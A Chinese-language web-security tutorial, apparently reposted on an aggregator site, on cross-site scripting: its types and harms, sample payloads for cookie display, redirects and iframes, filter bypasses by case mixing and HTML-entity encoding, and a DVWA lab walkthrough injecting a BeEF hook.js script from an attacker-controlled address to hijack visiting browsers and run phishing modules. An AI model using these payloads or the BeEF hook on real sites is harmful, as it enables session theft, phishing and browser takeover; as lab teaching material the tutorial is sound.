安全攻击 --- XSS攻击

这篇具有很好参考价值的文章主要介绍了安全攻击 --- XSS攻击。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

XSS跨站脚本攻击

(1)简介

  • OWASP TOP 10 之一,XSS被称为跨站脚本攻击(Cross-Site-Scripting)
  • 主要基于JavaScript(JS)完成攻击行为
  • XSS通过精心构造JS代码注入到网页中,并由浏览器解释运行这段代码,以达到恶意攻击的效果。用户访问被XSS脚本注入的网页,XSS脚本就会被提取出来,用户浏览器解析这段XSS代码,即用户被攻击了
  • 收集用于信息收入的地方,都有可能被注入XSS代码,只要没对用户输入存在严格的过滤,都可能被XSS

(2)危害

  1. 盗取各类账号,如:机器登录账号、用户网银账号、各类管理员账号
  2. 控制企业数据,如:读取、篡改、添加企业敏感数据的能力
  3. 盗窃企业重要的具有商业价值的资料
  4. 非法转账
  5. 强制发送电子邮件
  6. 网站挂马,更多人受害
  7. 控制受害者机器向其他机器发起攻击(卖肉机)

(3)分类

<1> 反射型
  • 非持久跨站脚本攻击
  • 攻击是一次性的,仅对当次访问页面产生影响

攻击流程:
安全攻击 --- XSS攻击,安全攻击,xss,安全,前端,web安全,网络

<2> 存储型
  • 持久性跨站点脚本
  • 攻击者的数据存储在服务端,攻击行为伴随攻击数据一直存在

攻击流程:
安全攻击 --- XSS攻击,安全攻击,xss,安全,前端,web安全,网络

<3> DOM型
  • 既有可能是反射型,也有可能是存储型
  • 基于文档对象模型(Document Object Model,DOM)的一种漏洞

(4)产生原因

  • web应用对用户输入过滤不严谨
  • 攻击者写入恶意的脚本代码到网页中
  • 用户访问含恶意代码的网页
  • 恶意脚本被浏览器解析执行导致用户被攻击

(5)构造XSS脚本

<1> 基础

常用html标签

  • <iframe>:创建包含另一个文档的内联框架
  • <textarea>:定义多行文本输入控件
  • <img>:网页中嵌入图像
  • <script>:定义客户端脚本,比如JavaScript

script标签即可包含脚本语句,也可通过src属性指向外部脚本文件

  • type属性规定脚本类型 ---(必需)
  • JavaScript常见应用是图像操作、表单验证以及动态内容更新

常用js脚本

  • alert:用于显示带有一条指定消息和一个确认按钮的警告框
  • window.location:获取当前页面地址(URL),并将浏览器重定向到新页面
  • location.href:返回当前显示文档的完整URL
  • onload:一张页面或图像完成加载
  • onsubmit:一个按钮被点击
  • onerror:加载文档或图像发生错误
<2> 构造脚本方式
  • 弹窗警告

例1:显示弹窗 -- <script>alert("欢迎12345")</script>

安全攻击 --- XSS攻击,安全攻击,xss,安全,前端,web安全,网络安全攻击 --- XSS攻击,安全攻击,xss,安全,前端,web安全,网络

例2:获取用户cookie -- <script>alert(document.cookie)</script>

安全攻击 --- XSS攻击,安全攻击,xss,安全,前端,web安全,网络
安全攻击 --- XSS攻击,安全攻击,xss,安全,前端,web安全,网络

  • 页面嵌套

例:<iframe style="overflow:hidden;width:520px;height:400px;positon:fixed;left:500px;top:400px;border:none;margin:0px;padding:0px;" src = "http://127.0.0.1:/dvwa-master/"></iframe>

安全攻击 --- XSS攻击,安全攻击,xss,安全,前端,web安全,网络
安全攻击 --- XSS攻击,安全攻击,xss,安全,前端,web安全,网络

  • 页面重定向

例1:<script>window.location="https://www.douyin.com/"</script>

安全攻击 --- XSS攻击,安全攻击,xss,安全,前端,web安全,网络
安全攻击 --- XSS攻击,安全攻击,xss,安全,前端,web安全,网络

例2:<script>location.href="https://www.bilibili.com/"</script>

安全攻击 --- XSS攻击,安全攻击,xss,安全,前端,web安全,网络
安全攻击 --- XSS攻击,安全攻击,xss,安全,前端,web安全,网络

  • 弹窗警告并且重定向

例:<script>alert("请移步到我们新站点");location.href="http://www.baidu.com/"</script>

安全攻击 --- XSS攻击,安全攻击,xss,安全,前端,web安全,网络
安全攻击 --- XSS攻击,安全攻击,xss,安全,前端,web安全,网络

  • 图片标签利用(图像标签有一定隐蔽性)

:<img src="#" οnerrοr="欢迎来钓鱼">

安全攻击 --- XSS攻击,安全攻击,xss,安全,前端,web安全,网络

  • 访问恶意网站代码(网站种马)

(诱导用户访问恶意网站的攻击文件xss.js,比如获取用户cookie稍后通过BeEF建立恶意站点)

  • 绕开过滤脚本

[1] 大小写
:<SCript>alert('xss')</ScrIpt>
安全攻击 --- XSS攻击,安全攻击,xss,安全,前端,web安全,网络

[2] 字符编码采用URL、base64、html等编码

例:采用html实体编码

<img src=x οnerrοr="&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041">
等同于:<img src=x onerrer=”javascript:alert('XSS')”>

安全攻击 --- XSS攻击,安全攻击,xss,安全,前端,web安全,网络

  • 存储型XSS演示

安全攻击 --- XSS攻击,安全攻击,xss,安全,前端,web安全,网络
(每个访问页面的人都会弹出这个对话框)
安全攻击 --- XSS攻击,安全攻击,xss,安全,前端,web安全,网络
安全攻击 --- XSS攻击,安全攻击,xss,安全,前端,web安全,网络

(6)自动XSS攻击详解

<1> BeEF

[1] 简介:Browser Exploation Framework(BeEF)是目前强大的浏览器开源渗透测试框架,通过XSS漏洞配合JS脚本和Metasploit进行渗透。BeEF是基于Ruby编写的,支持图形化界面,较为简单

http://beefproject.com/

安全攻击 --- XSS攻击,安全攻击,xss,安全,前端,web安全,网络

[2] 功能

1)信息收集

  • 网络发现
  • 主机信息
  • cookie获取
  • 会话劫持
  • 键盘记录
  • 插件信息

2)持久化控制

  • 确认弹框
  • 小窗口
  • 中间人

3)社会工程

  • 点击劫持
  • 弹窗警告
  • 虚假页面
  • 钓鱼页面

4)渗透攻击

  • 内网渗透
  • Metasploit
  • CSRF攻击
  • DDOS攻击
<2> 利用beef进行XSS自动攻击

1、打开beef
安全攻击 --- XSS攻击,安全攻击,xss,安全,前端,web安全,网络
安全攻击 --- XSS攻击,安全攻击,xss,安全,前端,web安全,网络

2、web界面打开并登入
安全攻击 --- XSS攻击,安全攻击,xss,安全,前端,web安全,网络

3、在DVWA中植入XSS脚本
DVWA清空缓存,植入<script src="http://192.168.174.131:3000/hook.js"></script>
安全攻击 --- XSS攻击,安全攻击,xss,安全,前端,web安全,网络
安全攻击 --- XSS攻击,安全攻击,xss,安全,前端,web安全,网络

4、其他机器访问被攻击机的DVWA页面
安全攻击 --- XSS攻击,安全攻击,xss,安全,前端,web安全,网络
127.0.0.1是其他机器,192.168.174.1是被攻击机(本机访问,肉机上线)

5、社工攻击范例
安全攻击 --- XSS攻击,安全攻击,xss,安全,前端,web安全,网络

命令的颜色区别:

  • 绿色对目标主机生效且不可见(不会被发现)
  • 橙色对目标主机生效但可能可见(可能被发现)
  • 灰色对目标主机未必生效(可验证)
  • 红色对目标主机不生效

附:社工攻击

1、pretty theft攻击
安全攻击 --- XSS攻击,安全攻击,xss,安全,前端,web安全,网络

2、中招页面
安全攻击 --- XSS攻击,安全攻击,xss,安全,前端,web安全,网络

3、beef查看搜集信息
安全攻击 --- XSS攻击,安全攻击,xss,安全,前端,web安全,网络文章来源地址https://www.toymoban.com/news/detail-647556.html


到了这里,关于安全攻击 --- XSS攻击的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 【安全测试】Web应用安全之XSS跨站脚本攻击漏洞

    目录 前言 XSS概念及分类 反射型XSS(非持久性XSS) 存储型XSS(持久型XSS) 如何测试XSS漏洞 方法一: 方法二: XSS漏洞修复 原则:不相信客户输入的数据 处理建议 资料获取方法 以前都只是在各类文档中见到过XSS,也进行过相关的学习,但是都是一知半解,过了一段时间就忘了。

    2024年02月14日
    浏览(16)
  • 网络安全——XSS跨站脚本攻击

    一、XSS概述 1、XSS被称为跨站脚本攻击,由于和CSS重名,所以改为XSS; 2、XSS主要基于JavaScript语言完成恶意的攻击行为,因为JavaScript可以非常灵活的操作html、CSS和浏览器 3、原理: XSS就是通过利用网页开发时留下的漏洞(由于Web应用程序对用户的输入过滤不足),巧妙的将恶

    2024年02月16日
    浏览(15)
  • 【网络安全】跨站脚本(xss)攻击

    跨站点脚本(也称为 XSS)是一种 Web 安全漏洞,允许攻击者破坏用户与易受攻击的应用程序的交互。它允许攻击者绕过同源策略,该策略旨在将不同的网站彼此隔离。跨站点脚本漏洞通常允许攻击者伪装成受害者用户,执行用户能够执行的任何操作,并访问用户的任何数据。

    2024年02月11日
    浏览(12)
  • 【网络安全】跨站脚本攻击(XSS)

    专栏文章索引:网络安全 有问题可私聊:QQ:3375119339 目录 一、XSS简介 二、XSS漏洞危害 三、XSS漏洞类型 1.反射型XSS 2.存储型XSS 3.DOM型XSS 四、XSS漏洞防御 XSS(Cross-Site Scripting) XSS 被称为跨站脚本攻击,由于和CSS重名,所以改为XSS。 XSS 主要使用 javascript , javascript 可以非常灵

    2024年04月28日
    浏览(16)
  • 网络安全进阶学习第二课——XSS跨站脚本攻击

    首先了解什么是前端。前端从定义上来讲是指一个网站的前台部分,是展示给用户看的部分。它不需要关注任何业务之间的逻辑处理,只需要安安静静地做好自己,老老实实的把自己最美的一面展示给用户。 Cookie 是在 HTTP 协议下,服务器或脚本可以维护客户工作站上信息的

    2024年02月11日
    浏览(18)
  • 前端面试:【XSS、CSRF、CSP】Web安全的三大挑战

    嗨,亲爱的Web开发者!在构建现代Web应用时,确保应用的安全性至关重要。本文将深入探讨三个常见的Web安全威胁:XSS(跨站脚本攻击)、CSRF(跨站请求伪造攻击)和CSP(内容安全策略),以帮助你了解并应对这些威胁。 1. XSS(跨站脚本攻击): XSS是一种攻击方式,攻击者

    2024年02月11日
    浏览(17)
  • [网络安全]XSS之Cookie外带攻击姿势及例题详析(基于DVWA靶场)

    本文仅分享XSS攻击知识,不承担任何法律责任。 本文涉及的软件等请读者自行安装,本文不再赘述。 XSS 的 Cookie 外带攻击就是一种针对 Web 应用程序中的 XSS(跨站脚本攻击)漏洞进行的攻击,攻击者通过在 XSS 攻击中注入恶意脚本,从而 窃取用户的 Cookie 信息 。 在使用XSS语

    2024年02月08日
    浏览(22)
  • 万字讲解9种Web应用攻击与防护安全。XSS、CSRF、SQL注入等是如何实现的

    OWASP(开放Web软体安全项目- Open Web Application Security Project) 是一个开源的、非盈利的全球性安全组织,致力于应用软件的安全研究。使命 是使应用软件更加安全,使企业和组织能够对应用安全风险做出更清晰的决策。 http://www.owasp.org.cn/ OWASP在业界影响力: OWASP被视为web应用

    2023年04月15日
    浏览(29)
  • 网络安全测试中的跨站点脚本攻击(XSS):Python和FlaskSecurity实现跨站脚本攻击测试

    作者:禅与计算机程序设计艺术 引言 1.1. 背景介绍 跨站点脚本攻击(XSS)是一种常见的网络安全漏洞,攻击者通过在受害者的浏览器上执行自己的脚本代码,窃取、修改用户的敏感信息。随着互联网的发展,跨站点脚本攻击在各类应用中愈发普遍。为了提高网络安全水平,

    2024年02月07日
    浏览(23)
  • 【网络安全】URL解析器混淆攻击实现ChatGPT账户接管、Glassdoor服务器XSS

    本文不承担任何由于传播、利用本文所发布内容而造成的任何后果及法律责任。 本文将基于ChatGPT及Glassdoor两个实例阐发URL解析器混淆攻击。 开始本文前,推荐阅读:【网络安全】Web缓存欺骗攻击原理及攻防实战 ChatGPT新增了\\\"分享\\\"功能,该功能允许用户与其他人公开分享聊天

    2024年02月20日
    浏览(25)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包